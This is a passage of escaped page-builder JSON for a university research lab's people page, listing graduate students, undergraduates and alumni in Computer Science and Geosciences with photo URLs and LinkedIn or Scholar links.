Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c78\",\"index\":1,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c72\",\"index\":2,\"id\":\"182-c75\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c72\",\"index\":3,\"id\":\"182-c245\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c72\",\"index\":1,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c84\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c84\",\"index\":2,\"id\":\"182-c87\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c88\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c342\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c343\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c344\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c342\",\"index\":2,\"id\":\"182-c345\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c342\",\"index\":3,\"id\":\"182-c346\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c342\",\"index\":1,\"id\":\"182-c347\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c348\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c349\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c350\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c348\",\"index\":2,\"id\":\"182-c351\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c348\",\"index\":3,\"id\":\"182-c352\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c348\",\"index\":1,\"id\":\"182-c353\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c354\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c355\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c356\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c354\",\"index\":2,\"id\":\"182-c357\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c354\",\"index\":3,\"id\":\"182-c358\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c354\",\"index\":1,\"id\":\"182-c359\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c361\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c362\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c363\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c361\",\"index\":2,\"id\":\"182-c364\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c361\",\"index\":3,\"id\":\"182-c365\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c361\",\"index\":1,\"id\":\"182-c366\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c367\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c368\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c369\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c367\",\"index\":2,\"id\":\"182-c370\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c367\",\"index\":3,\"id\":\"182-c371\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c373\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c374\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c375\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c373\",\"index\":2,\"id\":\"182-c376\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c373\",\"index\":3,\"id\":\"182-c377\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c373\",\"index\":1,\"id\":\"182-c378\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c379\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c380\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c381\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c379\",\"index\":2,\"id\":\"182-c382\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c379\",\"index\":3,\"id\":\"182-c383\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c379\",\"index\":1,\"id\":\"182-c384\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c98\",\"parentId\":\"182-c97\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c97\",\"parentId\":\"182-c96\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c96\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c169\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c169\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c168\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c177\",\"parentId\":\"182-c176\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c176\",\"parentId\":\"182-c175\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c175\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c256\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c257\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c258\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c256\",\"index\":2,\"id\":\"182-c259\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c256\",\"index\":1,\"id\":\"182-c261\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c262\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c263\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c264\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c262\",\"index\":2,\"id\":\"182-c265\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c262\",\"index\":1,\"id\":\"182-c267\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c268\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c269\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c270\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c268\",\"index\":2,\"id\":\"182-c271\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c268\",\"index\":1,\"id\":\"182-c273\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c274\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c275\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c276\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c274\",\"index\":2,\"id\":\"182-c277\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c274\",\"index\":1,\"id\":\"182-c279\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c385\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c386\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c387\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c385\",\"index\":2,\"id\":\"182-c388\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c385\",\"index\":1,\"id\":\"182-c389\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c390\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c391\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c392\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c390\",\"index\":2,\"id\":\"182-c393\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c390\",\"index\":1,\"id\":\"182-c394\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c395\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c396\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c397\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c395\",\"index\":2,\"id\":\"182-c398\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 